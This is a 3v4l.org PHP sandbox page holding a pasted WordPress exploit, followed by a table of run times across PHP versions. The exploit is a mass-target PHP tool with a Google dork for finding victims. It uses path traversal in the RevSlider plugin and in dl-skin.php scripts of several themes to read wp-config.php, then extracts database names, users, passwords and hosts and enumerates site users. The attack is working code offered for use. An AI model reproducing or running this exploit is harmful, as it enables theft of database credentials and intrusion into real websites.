3v4l.org

run code in 300+ PHP versions simultaneously
# Exploit Title: [Wordpress RevSlider Plugin LFD] # Google Dork: inurl:/admin-ajax.php?action=revslider_show_image # Date: 12/29/14 # Exploit Author: FarbodEZRaeL # Vendor Homepage: iranhack.org # Software Link: wordpress.org # Tested on: windows #Exploit: <html> <head> <title>Exploits Wordpress</title> </head> <body style="background-color: rebeccapurple;"> <pre><p><center style="color: aqua;"> ============================================================= = Exploits Wordpress RevSlider Plugin LFD Vuln = = = = Coded by FarbodEZRaeL = = Iranhack Security team = = www.iranhack.org = = Fix bug Other Version = ============================================================= <pre><href> <form method='POST'> <textarea name='sites' cols='45' rows='0'></textarea> <br> <input type='submit' value='Exploit' /> </form> <?php # Coded by FarbodEZRaeL # Exploits Wordpress RevSlider Plugin LFD Vuln @set_time_limit(0); error_reporting(0); $sites = explode("\r\n", $_POST['sites']); foreach($sites as $site) { $site = trim($site); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site"); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); $get = curl_exec($ch); curl_close($ch); if(preg_match("#WordPress (.*?)/>#", $get, $version)){ $str = str_replace('/>', "", $version[0]); $str = str_replace('"', "", $str); } $users = @file_get_contents("$site/?author=1"); preg_match('/<title>;(.*?)<\/title>/si',$users,$user); $wpuser = explode('|',$user[1]); echo " <br>======================================</br>"; echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $xp = curl_exec ($ch); curl_close($ch); if(preg_match("#DB_USER#i",$xp)){ preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME); echo "DB_NAME:{$DB_NAME[1]}<br>"; preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER); echo "DB_USER:{$DB_USER[1]}<br>"; preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD); echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>"; preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST); echo "DB_HOST:{$DB_HOST[1]}<br>"; } $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php"); foreach($lt as $l){ $site = "$site/$l"; $process = curl_init($site); curl_setopt($process, CURLOPT_TIMEOUT, 30); curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"); curl_setopt($process, CURLOPT_HEADER, TRUE); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php"); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); $return = curl_exec($process); if(preg_match("#DB_USER#i",$return)){ preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME); echo "DB_NAME:{$DB_NAME[1]}<br>"; preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER); echo "DB_USER:{$DB_USER[1]}<br>"; preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD); echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>"; preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST); echo "DB_HOST:{$DB_HOST[1]}<br>"; break; echo " <br>-----------------------------------</br>"; ob_implicit_flush(true); ob_end_flush(); } } } ?> </pre></p></center>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.60.0190.00316.88
8.3.50.0170.00716.60
8.3.40.0140.00718.88
8.3.30.0150.00018.70
8.3.20.0030.00520.16
8.3.10.0080.00021.86
8.3.00.0080.00021.93
8.2.180.0150.00418.29
8.2.170.0040.01222.96
8.2.160.0140.00319.04
8.2.150.0080.00024.18
8.2.140.0050.00324.66
8.2.130.0060.00319.44
8.2.120.0000.00726.35
8.2.110.0030.00620.77
8.2.100.0040.00718.28
8.2.90.0040.00419.43
8.2.80.0080.00018.18
8.2.70.0030.00617.75
8.2.60.0060.00318.05
8.2.50.0050.00318.10
8.2.40.0000.00820.80
8.2.30.0000.00920.98
8.2.20.0000.00818.17
8.2.10.0050.00318.23
8.2.00.0000.00718.16
8.1.280.0100.00725.92
8.1.270.0040.00423.93
8.1.260.0040.00426.35
8.1.250.0040.00428.09
8.1.240.0060.00323.79
8.1.230.0080.00319.21
8.1.220.0040.00417.74
8.1.210.0080.00018.77
8.1.200.0040.00417.47
8.1.190.0030.00617.48
8.1.180.0030.00518.10
8.1.170.0040.00419.15
8.1.160.0070.00019.15
8.1.150.0040.00420.67
8.1.140.0000.00719.56
8.1.130.0040.00418.90
8.1.120.0040.00417.60
8.1.110.0040.00417.51
8.1.100.0030.00617.47
8.1.90.0000.00717.53
8.1.80.0000.00817.55
8.1.70.0030.00517.56
8.1.60.0030.00617.57
8.1.50.0040.00417.54
8.1.40.0000.00817.57
8.1.30.0040.00417.69
8.1.20.0060.00717.73
8.1.10.0000.00817.75
8.1.00.0040.00417.50
8.0.300.0040.00418.77
8.0.290.0090.00016.88
8.0.280.0040.00418.49
8.0.270.0080.00017.36
8.0.260.0050.00317.03
8.0.250.0030.00317.13
8.0.240.0000.00717.08
8.0.230.0040.00417.15
8.0.220.0080.00017.07
8.0.210.0070.00017.07
8.0.200.0070.00016.99
8.0.190.0040.00417.01
8.0.180.0040.00417.07
8.0.170.0040.00417.14
8.0.160.0040.00417.08
8.0.150.0050.00217.03
8.0.140.0040.00416.98
8.0.130.0030.00313.53
8.0.120.0050.00217.03
8.0.110.0040.00416.93
8.0.100.0030.00616.89
8.0.90.0040.00417.10
8.0.80.0070.01117.05
8.0.70.0030.00516.95
8.0.60.0040.00417.04
8.0.50.0040.00417.01
8.0.30.0090.01017.21
8.0.20.0160.00317.40
8.0.10.0030.00517.23
8.0.00.0100.00916.85
7.4.330.0030.00315.55
7.4.320.0030.00316.76
7.4.300.0000.00616.72
7.4.290.0110.00016.51
7.4.280.0030.00616.55
7.4.270.0070.00016.58
7.4.260.0000.00816.67
7.4.250.0030.00316.57
7.4.240.0020.00516.62
7.4.230.0000.00716.71
7.4.220.0070.01016.63
7.4.210.0050.01016.66
7.4.200.0030.00316.63
7.4.160.0050.01316.67
7.4.150.0140.00417.40
7.4.140.0100.01017.86
7.4.130.0060.01316.64
7.4.120.0080.01216.57
7.4.110.0090.00816.58
7.4.100.0160.00016.70
7.4.90.0000.01716.73
7.4.80.0090.00919.39
7.4.70.0000.01516.50
7.4.60.0160.00316.69
7.4.50.0070.01116.42
7.4.40.0070.01016.73
7.4.30.0130.00816.62
7.4.00.0070.01015.04
7.3.330.0000.00613.23
7.3.320.0000.00513.23
7.3.310.0040.00416.44
7.3.300.0040.00416.48
7.3.290.0000.00716.44
7.3.280.0090.00816.49
7.3.270.0100.01017.40
7.3.260.0110.01116.51
7.3.250.0110.00816.56
7.3.240.0060.01616.58
7.3.230.0090.00916.64
7.3.210.0100.00716.50
7.3.200.0100.01016.61
7.3.190.0100.00716.57
7.3.180.0070.01016.53
7.3.170.0090.00916.77
7.3.160.0110.00516.75
7.3.120.0100.00714.93
7.3.110.0070.01114.98
7.3.100.0040.01515.21
7.3.90.0060.01214.97
7.3.80.0110.00415.02
7.3.70.0060.00914.73
7.3.60.0120.00314.79
7.3.50.0030.00914.82
7.3.40.0030.00915.02
7.3.30.0090.00915.04
7.3.20.0080.00316.66
7.3.10.0000.01016.63
7.3.00.0000.01016.71
7.2.330.0060.01216.76
7.2.320.0170.00716.87
7.2.310.0070.01016.73
7.2.300.0100.00716.51
7.2.290.0090.01316.92
7.2.250.0090.00915.09
7.2.240.0100.01015.02
7.2.230.0030.01315.20
7.2.220.0080.00815.35
7.2.210.0030.01315.03
7.2.200.0070.00715.29
7.2.190.0030.01014.98
7.2.180.0070.00315.16
7.2.170.0000.01314.96
7.2.110.0250.00616.71
7.2.60.0070.01016.86
7.2.00.0060.00619.59
7.1.330.0030.00916.09
7.1.320.0070.00315.96
7.1.310.0100.00615.97
7.1.300.0070.00715.54
7.1.290.0090.00915.92
7.1.280.0060.00615.91
7.1.270.0070.00315.64
7.1.260.0110.00315.99
7.1.200.0070.00715.79
7.1.100.0030.01218.37
7.1.70.0060.00617.25
7.1.60.0160.00934.81
7.1.50.0170.01034.96
7.1.40.0160.01034.46
7.1.30.0170.01034.55
7.1.20.0130.01334.57
7.1.10.0000.01516.36
7.1.00.0000.01216.62
7.0.200.0060.00616.86
7.0.190.0000.01216.41
7.0.180.0030.00916.13
7.0.170.0080.00416.41
7.0.160.0030.00916.37
7.0.150.0050.00916.08
7.0.140.0030.00916.38
7.0.130.0030.01016.44
7.0.120.0060.00616.42
7.0.110.0030.01116.43
7.0.100.0040.01116.25
7.0.90.0070.00716.41
7.0.80.0070.00716.41
7.0.70.0000.01616.14
7.0.60.0030.01216.25
7.0.50.0090.00316.57
7.0.40.0000.01216.54
7.0.30.0040.00816.75
7.0.20.0000.01216.50
7.0.10.0090.00316.64
7.0.00.0040.00816.54
preferences:
35.96 ms | 400 KiB | 5 Q